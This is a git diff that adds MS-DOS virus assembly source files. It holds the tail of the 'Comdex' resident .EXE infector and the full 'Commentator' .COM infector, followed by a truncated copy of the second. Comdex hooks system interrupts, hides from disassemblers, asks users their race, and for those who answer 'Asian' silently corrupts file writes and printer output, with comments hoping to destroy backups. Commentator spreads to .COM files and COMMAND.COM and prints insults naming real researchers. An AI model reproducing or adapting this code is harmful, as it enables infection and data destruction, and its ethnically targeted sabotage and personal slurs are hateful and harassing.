;dummy op + mov ax,cs + mov es:[005eh],ax + mov ax,offset new17 + mov es:[005ch],ax + +; +; hook interrupt 14: +; (bios serial port services) +; +; mov ax,es:[0050h] +; mov cs:[old17],ax +; mov ax,es:[0052h] +; mov cs:[old14+2],ax +; mov ax,cs +; mov es:[0052h],ax +; mov ax,offset new14 +; mov es:[0050h],ax +; +; +; + cmp word ptr cs:[noinf],5 + jg hook8 + jmp exit +; +; hook interrupt 9 +; (bios keyboard interrupt) +; +;hook9: mov ax,es:[0024h] +; mov cs:[old9],ax +; mov ax,es:[0026h] +; mov cs:[old9+2],ax +; mov ax,cs +; mov es:[0026h],ax +; mov ax,offset new9 +; mov es:[0024h],ax +; +; hook interrupt 8 +; (timer ticks) +; + db 3dh,0cch,03h,3dh,3dh ;confuse dissassemblers +hook8: mov ax,es:[0020h] + mov cs:[old8],ax + mov ax,es:[0022h] + mov cs:[old8+2],ax + mov ax,cs + nop + mov 
es:[0022h],ax + mov ax,offset new8 + mov es:[0020h],ax + jmp exit + + +;the int 21 calls go through this routine to confuse the issue: +int21: push ax + mov ax,0ffh + mov word ptr cs:[internal],ax ;set internal int 21 flag + mov al,20h + inc al ;put 21 in al + mov byte ptr cs:[int21b],al ;self modifying code! + pop ax + db 0cdh ;int opcode +int21b: db 0cch ;overwritten to int 21h + push ax + mov ax,00 + mov word ptr cs:[internal],ax ;clear internal int 21 flag + mov ax,0cch + mov byte ptr cs:[int21b],al ;nuke it back to int 0cch + pop ax + retn + + + + db "Welcome to Comdex " + db "From the Interface Group, Inc. " + db "300 First Avenue " + db "Needham, MA 02194 " + db "(617)449-6600 " + db "For data recovery ask for " + db "Peter J. Bowes, unless you are " + db "Oriental, in which case, we will " + db "not help you. " + +quest db 0dh,0ah,"Software Piracy Prevention Center",0dh,0ah + db "requests your cooperation:",0dh,0ah,0dh,0ah + db "Please enter your race or nationality:",0dh,0ah + db "a. White e. Eastern European",0dh,0ah + db "b. Black f. Soviet",0dh,0ah + db "c. Hispanic g. Western European",0dh,0ah + db "d. Asian/Pacific Rim h. Other",0dh,0ah,0dh,0ah + db " Please enter your response: ","$" + +input_char: db 0 + db 3dh ;confuse disassemblers + +askit: push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + cmp byte ptr cs:[min60],1 ;resident 1 hr yet? + jnz noask + cmp byte ptr cs:[input_char],0 + jnz noask ;don't ask twice + mov ax,word ptr cs:[timer] + and ax,000fh ;look at ls free running clock + cmp ax,000ch ;does it happen to be 00ch? (1 of 16) + jnz noask ;if not, don't ask the guy! 
+ + mov dx,offset quest ;ask the guy about race + mov ah,09h ;dos string print + push cs + pop ds + call int21 ;print question on crt + mov ax,0c01h ;dos flush input and get char + call int21 ;get char + and al,0dfh ;force upper case + mov byte ptr cs:[input_char],al ;save away response +noask: pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retn + +;******************************************************************** + +; +; int 9 (keyboard) replacement: +; this routine does not become active until 50 minutes after +; the execution of an affected program. +; +;new9: push ax +; push es +; cmp byte ptr cs:[min50],1 +; jnz retx1 + +;insert any code here that activates 50 min after launch for int 9... + +;retx1: pop es ;prepare to go to old int 9 code: +; pop ax +; db 0eah ;jmp 0000:0000 nmemonic +;old9 dw 0,0 ;storage for old addr + + +;******************************************************************** +; +; new int 14 (serial port) routine - +; +;new14: cmp ah,1 ;is it an output request? +; jz s1 ;yup. don't return just yet. +;do14: db 0eah ;jmp 0000:0000 nmemonic +;old14 dw 0,0 +;s1: + +;insert any code here for output to serial port... + +; jmp do14 + + +;******************************************************************** +; +; new int 8 routine (bios timer ticks) +; + db 3dh ;piss off disassemblers +new8: push dx + push cx + push bx + push ax + jmp txex ;&& + inc word ptr cs:[timer] ; increment timer + cmp byte ptr cs:[min60],01 ; if counter >= 60 min. + jz tt0 ; no need to check any more + cmp word ptr cs:[timer],-11 ; 60 minutes ? + jz tt1 + cmp word ptr cs:[timer],54601 ; 50 minutes ? + jz tt2 + jmp txex +; +; 50 minutes after an affected program is run the flag is set. +; +tt2: mov byte ptr cs:[min50],1 + jmp txex +; +; 60 minutes after an affected program is run this flag is set. +; +tt1: mov byte ptr cs:[min60],1 + +; exit interrupt routine: + + jmp txex +; +; every time an int 8 occurs, after the 60 min. 
have passed, we +; end up here: +; +tt0: +;insert any fun timer oriented code here +; +; restore registers and quit +; +txex: pop ax + pop bx + pop cx + pop dx + db 0eah +old8 dw 0,0 + +;******************************************************************** +; +; new int 17 routine. lpt out stuff. +; +new17: jmp do17 ;&& + cmp ah,0 + + jz p0 +do17: db 0eah +old17 dw 0,0 + db 2eh ;confuse disassemblers +p0: cmp byte ptr cs:[input_char],44h ;d. asian/pacific rim? + jne not_asian + push ax + mov ax,word ptr cs:[timer] + and ax,00ffh + cmp ax,0032h ; one of 256 odds + pop ax ; restore ax, doesn't change flags + jne do17 ; don't twiddle lpt 255/256 odds + cmp al,55h ; printing a "U"? + jne notu + mov al,0efh ; make it upside-down! + jmp do17 ; and continue. +notu: cmp al,06fh ; lower case "o"? + jne do17 ; no? then exit. + mov al,093h ; make it an "o" with a ^ over it! + jmp do17 ; and exit. +not_asian: + jmp do17 + + +;Int 21 file adjustment routines - the following routines corrupt a small +;percentage of the file writes that Asians do in their use of the pc. For +;example, when one updates a spreadsheet or exits a word processor, the +;application software will re-write the file out to disk. What we do here +;is reduce the amount of the data that is written to the file. The hope +;is that the problem will be hidden for a significant period of time, since +;it happens only infrequently, and since it typically will happen upon exit +;of the application package. If the reduction of the write causes a serious +;problem (we hope it will) it won't usually be noticed until that file is +;loaded again. The other hope is that if the user does backup his data from +;time to time, this corrupted data will end up on the backup as well before +;the problem is noticed. With luck, maybe the user will assume that the +;hardware is intermittent, and backup the system over the top of his only +;existing backup set, then purchase replacement hardware. 
+ + + +fuck_size_f: ;if asian, reduce file rec size by 1 on fcb ops + push ax + push di + push dx ;setup di for indexed operations + pop di + cmp byte ptr cs:[input_char],044h ;asian? + jne exit_fuck_f ;no, then do nothing + mov ax,word ptr cs:[timer] + and ax,00ffh ;mask off ls 8 bits of free run timer + cmp ax,0069h ;does it happen to be 69h? (1 of 256) + jne exit_fuck_f ;nope, so do nothing + + mov al,[ds:di+0] ;get first byte of user's fcb + cmp al,0ffh ;extended fcb? + jne norm_fcb ;nope, so handle as normal fcb + mov ax,[ds:di+15h] ;get record size, 16 bits on extd fcb. + dec ax ;adjust it a bit, since the user really doesn't + ;need to write so much data. + mov [ds:di+15h],ax + jmp exit_fuck_f ;subsequent r/w ops should fail to get the + ;right data until this file is closed or + ;until system crashes. + +norm_fcb: + mov al,[ds:di+0eh] ;get record size, only 8 bits on norm fcb. + dec al ;reduce by 1 + mov [ds:di+0eh],al ;store it back +exit_fuck_f: + pop di + pop ax + jmp do21 + + +fuck_size_h: ;reduce length of handle file writes + push ax + push di + push dx + pop di + cmp byte ptr cs:[input_char],044h ;asian? + jne exit_fuck_h ;no, so don't damage anything. + mov ax,word ptr cs:[timer] + and ax,00ffh + cmp ax,0066h ;one out of 256 odds + jne try_again ;no? well give it another chance. + and cx,0fff5h ;reduce write length in bytes by a flakey amt + dec cx ;ranging from 1 to 11 bytes. +exit_fuck_h: + pop ax + jmp do21 + +try_again: + cmp ax,0077h ;one of 256 odds? + jne exit_fuck_h ;exit if not lucky. + mov ax,[ds:di+30h] ;get a user data byte from his buffer + xor ax,0004h ;toggle bit 2 of byte 30h + mov [ds:di+30h],ax ;and put it back + jmp exit_fuck_h + +;******************************************************************** +; +; this is the int 21 replacement. it only does something in +; the case of an execute program dos call. +; +;be careful here not to trap int codes that we use internally! 
+new21: jmp do21 ;&& + push ax + cmp word ptr cs:[internal],0ffh ;is it an internal int 21? + je do21 ;yup, so no tweaking allowed + pop ax + cmp ah,015h ;is it a fcb file write? + je fuck_size_f ;if asian, reduce record size by 1 + cmp ah,040h ;is it a handle file write? + je fuck_size_h ;if asian, adjust write length down. + cmp ah,4bh ;is it an int 21 code 4b? + je l5 ;yup. go affect stuff +do21: db 0eah ;nope. let dos handle it +old21 dw 0,0 +; +; the code to only affect every tenth program has been removed +; for now. restore this code later. +; + db 3dh ;confuse disassemblers +l5: call askit ;ask race if appropriate + push ax + push bx + push cx + push dx + push si + push ds +; +; search for the file name extension ... +; + mov bx,dx +l6: inc bx + cmp byte ptr [bx],'.' + je l8 + cmp byte ptr [bx],0 + jne l6 +; +; ... and quit unless it starts with "ex". +; +l7: pop ds + pop si + pop dx + pop cx + pop bx + pop ax + jmp do21 +l8: inc bx + cmp word ptr [bx],5845h ;"EX" + jne l7 +; +; when an .exe file is found, Comdex starts by turning off +; the read-only attribute. the read-only attribute is not restored +; when the file has been affected. +; + mov ax,4300h ; get attribute + call int21 + jc l7 + mov ax,4301h ; set attribute + and cx,0feh + call int21 + jc l7 +; +; next, the file is examined to see if it is already affected. +; the signature (4418 5f19) is stored in the last two words. +; + mov ax,3d02h ; open / write access + call int21 + jc l7 + mov bx,ax ; file handle in bx +; +; this part of the code is new: get date of file. +; + mov ax,5700h + call int21 + jc l9 + mov cs:[date1],dx + mov cs:[date2],cx +; + push cs ; now ds is no longer needed + pop ds +; +; the header of the file is read in at [id+8]. Comdex then +; modifies itself, according to the information stored in the +; header. (the original cs and ip addressed are stored). 
+; + mov dx,offset id+8 + mov cx,1ch + mov ah,3fh + call int21 + jc l9 + mov ax,ds:id[1ch] + mov ds:[org_ip],ax + inc ax ;confuse reader a little + mov ax,ds:id[1eh] + add ax,10h + mov ds:[org_cs],ax +; +; next the read/write pointer is moved to the end of the file-4, +; and the last 4 bytes read. they are compared to the signature, +; and if equal nothing happens. +; + mov ax,4202h + mov cx,-1 + mov dx,-4 + call int21 + jc l9 + add ax,4 + mov ds:[len_lo],ax + jnc l8a + inc dx +l8a: mov ds:[len_hi],dx +; +; this part of Comdex is new - check if it is below minimum length +; + cmp dx,0 + jne l8b + mov cl,13 + shr ax,cl + cmp ax,0 + jg l8b + nop + jmp short l9 +l8b: mov ah,3fh + mov cx,4 + mov dx,offset id+4 + call int21 + jnc l11 +l9: mov ah,3eh + call int21 +l10: jmp l7 + db 3eh ;confuse disassemblers +; +; compare to 4f43,444d which is first 4 letters of Comdex +; +l11: mov si,offset id+4 + mov ax,[si] + cmp ax,4f43h ;ascii "OC" + jne l12 + mov ax,[si+2] + cmp ax,444dh ;ascii "DM" + je l9 +; +; the file is not affected, so the next thing Comdex does is +; affect it. first it is padded so the length becomes a multiple +; of 16 bytes. this is done so Comdex code can start at a +; paragraph boundary. +; +l12: mov ax,ds:[len_lo] + and ax,0fh + jz l13 + mov cx,16 + sub cx,ax + nop + add ds:[len_lo],cx + jnc l12a + inc ds:[len_hi] +l12a: mov ah,40h + call int21 ;dos write to file + jc l9 +; +; next the main body of Comdex is written to the end. +; +l13: xor dx,dx + mov cx,offset id + 4 + mov ah,40h ;dos write to file + call int21 + jc l9 +; +; next the .exe file header is modified: +; +; first modify initial ip +; +f0: mov ax,offset labl + mov ds:id[1ch],ax +; +; modify starting cs = Comdex cs. 
it is computed as: +; +; (original length of file+padding)/16 - start of load module +; + mov dx,ds:[len_hi] + mov ax,ds:[len_lo] + mov cl,cs:[const1] ; modified a bit + shr dx,cl + rcr ax,cl + nop + shr dx,cl + rcr ax,cl + shr dx,cl + rcr ax,cl + nop + shr dx,cl + rcr ax,cl + sub ax,ds:id[10h] + mov ds:id[1eh],ax +; +; modify length mod 512 +; + add ds:[len_lo],offset id+4 + jnc l14 + inc ds:[len_hi] +l14: mov ax,ds:[len_lo] + and ax,511 + nop + mov ds:id[0ah],ax +; +; modify number of blocks used +; + mov dx,ds:[len_hi] + mov ax,ds:[len_lo] + add ax,511 + jnc l14a + inc dx +l14a: mov al,ah + mov ah,dl + shr ax,1 + mov ds:id[0ch],ax +; +; finally the modified header is written back to the start of the +; file. +; +wrtback:mov ax,4200h + xor cx,cx + xor dx,dx + call int21 ;dos move file pointer + jc endit + mov ah,40h + mov dx,offset id+8 + mov cx,1ch + call int21 ;dos write to file +; +; this part is new: restore old date. +; + mov dx,cs:[date1] + mov cx,cs:[date2] + mov ax,5701h + call int21 ;dos set file date and time + jc endit + inc word ptr cs:[noinf] +; +; affection is finished - close the file and execute it +; +endit: jmp l9 +; +; + +timer dw 0 ; number of timer (int 8) ticks +const1 db 1 ; the constant 1 +const0 dw 0 ; the constant 0 +internal dw 0 ; internal int 21 in effect. +min50 db 0 ; flag, set to 1 50 minutes after execution +min60 db 0 ; flag, set to 1 60 minutes after execution +vmode db 0 ; video mode +date1 dw ? ; date of file +date2 dw ? ; ditto. +len_lo dw ? +len_hi dw ? +noinf dw 0 ; number of affections +id label word + db "COMD" ; the signature of Comdex. +; +; a buffer, used for data from the file. +; + +Comdex endp +code ends + + end labl + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.comment1.asm b/MSDOS/Virus.MSDOS.Unknown.comment1.asm new file mode 100644 index 00000000..96f0f6a9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comment1.asm 
@@ -0,0 +1,334 @@ +;谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Commentator Virus by Glenn... +;媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This will be a Parasytic Non-Resident .COM infector. +; It will also infect COMMAND.COM. +;滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +.MODEL TINY + +Public VirLen,MovLen + +Code Segment para 'Code' +Assume Cs:Code,Ds:Code,Es:Code + + Org 100h + +Signature Equ 0DaDah ; Signature of virus! + +Buff1 Equ 0F100h +Buff2 Equ Buff1+2 +VirLen Equ Offset Einde-Offset Begin +MovLen Equ Offset Einde-Offset Mover +DTA Equ 0F000h +Proggie Equ DTA+1Eh +Lenny Equ DTA+1Ah + +MinLen Equ Virlen ;Minimale lengte te besmetten programma +MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This part will contain the actual virus code, for searching the +; next victim and infection of it. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +Begin: + Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk + DW Signature ; Herkenningsteken virus +Oversig: + Pushf ;------------------ + Push AX ; Alle registers opslaan voor + Push BX ; later gebruik van het programma + Push CX ; + Push DX ; + Push DS ; + Push ES ; + Push SS ; + Push SI ; + Push DI ;------------------ +InfectPart: + Mov AX,Sprong ;------------------ + Mov Buf1,AX ; Spronggegevens bewaren om + Mov BX,Source ; besmette programma te starten + Mov Buf2,BX ;------------------ + Mov AH,1Ah ; DTA area instellen op + Mov DX,DTA ; $DTA area + Int 21h ;------------------ +Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory + Mov Cx,1 ; + Lea DX,FindPath ; + Int 21h ;------------------ + Jnc KijkInfected ; Geen gevonden, goto Afgelopen + Jmp Afgelopen ;------------------ +KijkInfected: + Mov DX,Cs:[Lenny] ;------------------ + Cmp DX,MinLen ; Kijken of programmalengte voldoet + Jb ZoekNext ; aan de eisen van het virus + Cmp DX,MaxLen ; + Ja ZoekNext ;------------------ +On2: Mov AH,3Dh ; Zo ja , file openen en file handle + Mov AL,2 ; opslaan + Mov DX,Proggie 
; + Int 21h ; + Mov FH,AX ;------------------ + Mov BX,AX ; + Mov AH,3Fh ; Lezen 1e 4 bytes van een file met + Mov CX,4 ; een mogelijk kenmerk van het virus + Mov DX,Buff1 ; + Int 21h ;------------------ +Sluiten: Mov AH,3Eh ; File weer sluiten + Int 21h ;------------------ + Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 + Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op + Jnz Infect ; morgoth virus. Als bestand al besmet +ZoekNext: + Mov AH,4Fh ;------------------ + Int 21h ; Zoeken naar volgende .COM file + Jnc KijkInfected ; Geen gevonden, goto Afgelopen + Jmp Afgelopen ;------------------ +Infect: + Mov DX,Proggie ; beveiliging weghalen + Mov AH,43h ; + Mov AL,1 ; + Xor CX,Cx + Int 21h ;------------------ + Mov AH,3Dh ; Bestand openen + Mov AL,2 ; + Mov DX,Proggie ; + Int 21h ;------------------ + Mov FH,AX ; Opslaan op stack van + Mov BX,AX ; datum voor later gebruik + Mov AH,57H ; + Mov AL,0 ; + Int 21h ; + Push CX ; + Push DX ;------------------ + Mov AH,3Fh ; Inlezen van eerste deel van het + Mov CX,VirLen+2 ; programma om later terug te + Mov DX,Buff1 ; kunnen plaatsen. 
+ Int 21h ;------------------ + Mov AH,42H ; File Pointer weer naar het + Mov AL,2 ; einde van het programma + Xor CX,CX ; zetten + Xor DX,DX ; + Int 21h ;------------------ + Xor DX,DX ; Bepalen van de variabele sprongen + Add AX,100h ; in het virus (move-routine) + Mov Sprong,AX ; + Add AX,MovLen ; + Mov Source,AX ;------------------ + Mov AH,40H ; Move routine bewaren aan + Mov DX,Offset Mover ; einde van file + Mov CX,MovLen ; + Int 21h ;------------------ + Mov AH,40H ; Eerste deel programma aan- + Mov DX,Buff1 ; voegen na Move routine + Mov CX,VirLen ; + Int 21h ;------------------ + Mov AH,42h ; File Pointer weer naar + Mov AL,0 ; het begin van file + Xor CX,CX ; sturen + Xor DX,DX ; + Int 21h ;------------------ + Mov AH,40h ; En programma overschrijven + Mov DX,Offset Begin ; met code van het virus + Mov CX,VirLen ; + Int 21h ;------------------ + Mov AH,57h ; Datum van aangesproken file + Mov AL,1 ; weer herstellen + Pop DX ; + Pop CX ; + Int 21h ;------------------ + Mov AH,3Eh ; Sluiten file + Int 21h ;------------------ +Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer + Mov Source,BX ; op normaal zetten voor + Mov AX,Buf1 ; de Move routine + Mov Sprong,AX ;------------------ + Mov AH,1Ah ; DTA adres weer op normaal + Mov Dx,80h ; zetten en naar de Move + Int 21h ; routine springen + Mov Ah,2Ch + Int 21h + Xor DL,DL + Xchg Dh,Dl + Add Dx,Dx +; And Dx,11111110b + Add Dx,Offset MsgTab + Mov Si,Dx + Mov Dx,Cs:[SI] + Mov AH,9 + Int 21h + Jmp CS:[Sprong] ;------------------ + +Msgtab DW offset Msg1 + DW offset Msg2 + DW offset Msg3 + DW offset Msg4 + DW offset Msg5 + DW offset Msg6 + DW offset Msg7 + DW offset Msg8 + DW offset Msg9 + DW offset Msg10 + DW offset Msg11 + DW offset Msg12 + DW offset Msg13 + DW offset Msg14 + DW offset Msg15 + DW offset Msg16 + DW offset Msg17 + DW offset Msg18 + DW offset Msg19 + DW offset Msg20 + DW offset Msg21 + DW offset Msg22 + DW offset Msg23 + DW offset Msg24 + DW offset Msg25 + DW offset Msg26 + DW offset Msg27 + DW 
offset Msg28 + DW offset Msg29 + DW offset Msg30 + DW offset Msg31 + DW offset Msg32 + DW offset Msg33 + DW offset Msg34 + DW offset Msg35 + DW offset Msg36 + DW offset Msg37 + DW offset Msg38 + DW offset Msg39 + DW offset Msg40 + DW offset Msg41 + DW offset Msg42 + DW offset Msg43 + DW offset Msg44 + DW offset Msg45 + DW offset Msg46 + DW offset Msg47 + DW offset Msg48 + DW offset Msg49 + DW offset Msg50 + DW offset Msg51 + DW offset Msg52 + DW offset Msg53 + DW offset Msg54 + DW offset Msg55 + DW offset Msg56 + DW offset Msg57 + DW offset Msg58 + DW offset Msg59 + DW offset Msg60 + +Msg1 Db 13,10,'McAfee is a bum-hole',13,10,'$' +Msg2 Db 13,10,'Patricia Hoffman is a virgin',13,10,'$' +Msg3 Db 13,10,'David Grant is a shithead',13,10,'$' +Msg4 Db 13,10,'Jan Terpstra sucks',13,10,'$' +Msg5 Db 13,10,'Vesselin Bontchev is a lamer',13,10,'$' +Msg6 Db 13,10,'Righard Zwienenberg is a cowboy',13,10,'$' +Msg7 Db 13,10,'Greetings to Cracker Jack in Italy',13,10,'$' +Msg8 Db 13,10,'MS-DOS could be programmed better',13,10,'$' +Msg9 Db 13,10,'A virus may not hang, it must replicate!',13,10,'$' +Msg10 Db 13,10,'(C) by Glenn Benton DVRL',13,10,'$' +Msg11 Db 13,10,'HAHAHA you have a virus',13,10,'$' +Msg12 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' +Msg13 Db 13,10,'Program to big to fit in ass',13,10,'$' +Msg14 Db 13,10,'Another program bites the dust',13,10,'$' +Msg15 Db 13,10,'Havahey! Another Me born to serve',13,10,'$' +Msg16 Db 13,10,'Deicide wasnt that good after all...',13,10,'$' +Msg17 Db 13,10,'DEICIDE, MORGOTH, BREEZE, BROTHER by Glenn Benton',13,10,'$' +Msg18 Db 13,10,'Hey! 
Gimme some more disks!',13,10,'$' +Msg19 Db 13,10,'Stealth techniques are cool',13,10,'$' +Msg20 Db 13,10,'Encryption is usefull...',13,10,'$' +Msg21 Db 13,10,'Stephanie my lovely girl',13,10,'$' +Msg22 Db 13,10,'FPROT is compiled BASIC',13,10,'$' +Msg23 Db 13,10,'Fuck da police!',13,10,'$' +Msg24 Db 13,10,'Source soon aveable for jokes!',13,10,'$' +Msg25 Db 13,10,'Why dont you play with something else?',13,10,'$' +Msg26 Db 13,10,'Thanks to BORLAND for Turbo Assembler',13,10,'$' +Msg27 Db 13,10,'It is time for NORTON SPEED DISK',13,10,'$' +Msg28 Db 13,10,'Donald duck is a lie...',13,10,'$' +Msg29 Db 13,10,'Why dont you buy me a CHEESEBURGER?',13,10,'$' +Msg30 Db 13,10,'Wim Kok is a COMMUNIST!!!!',13,10,'$' + +Msg31 Db 13,10,'Xabaras could be better',13,10,'$' +Msg32 Db 13,10,'FAT has a nice technique',13,10,'$' +Msg33 Db 13,10,'This virus is not resident!',13,10,'$' +Msg34 Db 13,10,'Nobody like debugging...',13,10,'$' +Msg35 Db 13,10,'60 Messages in here?',13,10,'$' +Msg36 Db 13,10,'Out of worktime',13,10,'$' +Msg37 Db 13,10,'RAM parity error',13,10,'$' +Msg38 Db 13,10,'Insert porn magazine in drive A',13,10,'$' +Msg39 Db 13,10,'Insert tracktor toilet paper in printer',13,10,'$' +Msg40 Db 13,10,'Upload this virus to McAfee, please',13,10,'$' +Msg41 Db 13,10,'HIP-HOP sucks!',13,10,'$' +Msg42 Db 13,10,'Vote for Saddam.',13,10,'$' +Msg43 Db 13,10,'DEAD BY DAWN',13,10,'$' +Msg44 Db 13,10,'NAIL HIM LIKE JESUS!',13,10,'$' +Msg45 Db 13,10,'May I fuck with your wife?',13,10,'$' +Msg46 Db 13,10,'Hey CJ! 
What abouth a Corporation (I&DVRL)',13,10,'$' +Msg47 Db 13,10,'Thanx to Oliver North for giving me TASM',13,10,'$' +Msg48 Db 13,10,'Do not use drugs, make a virus!',13,10,'$' +Msg49 Db 13,10,'Register this produkt!',13,10,'$' +Msg50 Db 13,10,'This virus is SHAREWARE',13,10,'$' +Msg51 Db 13,10,'You will hate me for this',13,10,'$' +Msg52 Db 13,10,'See the sunny side of life',13,10,'$' +Msg53 Db 13,10,'DAME EDNA IS COOL!',13,10,'$' +Msg54 Db 13,10,'I like the pope, the pope smokes dope!',13,10,'$' +Msg55 Db 13,10,'We like the pope, he gives us his dope!',13,10,'$' +Msg56 Db 13,10,'Are you FLINTSTONED???',13,10,'$' +Msg57 Db 13,10,'How about a game of STRIP-POKER?',13,10,'$' +Msg58 Db 13,10,'FACES OF DEATH!',13,10,'$' +Msg59 Db 13,10,'Just one more message!!!',13,10,'$' +Msg60 Db 13,10,'Spread this like hell!',13,10,'$' + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; All variables are stored in here, like filehandle, date/time, +; search path and various buffers. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +FH DW 0 +FindPath DB '*.COM',0 + +Buf1 DW 0 +Buf2 DW 0 + +Sprong DW 0 +Source DW 0 + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This will contain the relocator routine, located at the end of +; the ORIGINAL file. This will tranfer the 1st part of the program +; to it's original place. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +Mover: + Mov DI,Offset Begin ;------------------ + Mov SI,Source ; Verplaatsen van het 1e deel + Mov CX,VirLen-1 ; van het programma, wat achter + Rep Movsb ;------------------ + Pop DI ; Opgeslagen registers weer + Pop SI ; terugzetten op originele + Pop SS ; waarde en springen naar + Pop ES ; het begin van het programma + Pop DS ; (waar nu het virus niet meer + Pop DX ; staat) + Pop CX ; + Pop BX ; + Pop AX ; + Popf ; + Mov BX,100h ; + Jmp BX ;------------------ + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Only the end of the virus is stored in here. 
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +Einde db 0 + +Code Ends +End Begin + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.comment2.asm b/MSDOS/Virus.MSDOS.Unknown.comment2.asm new file mode 100644 index 00000000..68efded9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comment2.asm 
@@ -0,0 +1,334 @@
+;谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; Commentator Virus by Glenn...
+;媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; This will be a Parasytic Non-Resident .COM infector.
+; It will also infect COMMAND.COM.
+;滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+.MODEL TINY
+
+Public VirLen,MovLen
+
+Code Segment para 'Code'
+Assume Cs:Code,Ds:Code,Es:Code
+
+ Org 100h
+
+Signature Equ 0DeDeh ; Signature of virus!
+
+Buff1 Equ 0F100h
+Buff2 Equ Buff1+2
+VirLen Equ Offset Einde-Offset Begin
+MovLen Equ Offset Einde-Offset Mover
+DTA Equ 0F000h
+Proggie Equ DTA+1Eh
+Lenny Equ DTA+1Ah
+
+MinLen Equ Virlen ;Minimale lengte te besmetten programma
+MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; This part will contain the actual virus code, for searching the
+; next victim and infection of it.
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+
+Begin:
+ Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk
+ DW Signature ; Herkenningsteken virus
+Oversig:
+ Pushf ;------------------
+ Push AX ; Alle registers opslaan voor
+ Push BX ; later gebruik van het programma
+ Push CX ;
+ Push DX ;
+ Push DS ;
+ Push ES ;
+ Push SS ;
+ Push SI ;
+ Push DI ;------------------
+InfectPart:
+ Mov AX,Sprong ;------------------
+ Mov Buf1,AX ; Spronggegevens bewaren om
+ Mov BX,Source ; besmette programma te starten
+ Mov Buf2,BX ;------------------
+ Mov AH,1Ah ; DTA area instellen op
+ Mov DX,DTA ; $DTA area
+ Int 21h ;------------------
+Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory
+ Mov Cx,1 ;
+ Lea DX,FindPath ;
+ Int 21h ;------------------
+ Jnc KijkInfected ; Geen gevonden, goto Afgelopen
+ Jmp Afgelopen ;------------------
+KijkInfected:
+ Mov DX,Cs:[Lenny] ;------------------
+ Cmp DX,MinLen ; Kijken of programmalengte voldoet
+ Jb ZoekNext ; aan de eisen van het virus
+ Cmp DX,MaxLen ;
+ Ja ZoekNext ;------------------
+On2: Mov AH,3Dh ; Zo ja , file openen en file handle
+ Mov AL,2 ; opslaan
+ Mov DX,Proggie
;
+ Int 21h ;
+ Mov FH,AX ;------------------
+ Mov BX,AX ;
+ Mov AH,3Fh ; Lezen 1e 4 bytes van een file met
+ Mov CX,4 ; een mogelijk kenmerk van het virus
+ Mov DX,Buff1 ;
+ Int 21h ;------------------
+Sluiten: Mov AH,3Eh ; File weer sluiten
+ Int 21h ;------------------
+ Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2
+ Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op
+ Jnz Infect ; morgoth virus. Als bestand al besmet
+ZoekNext:
+ Mov AH,4Fh ;------------------
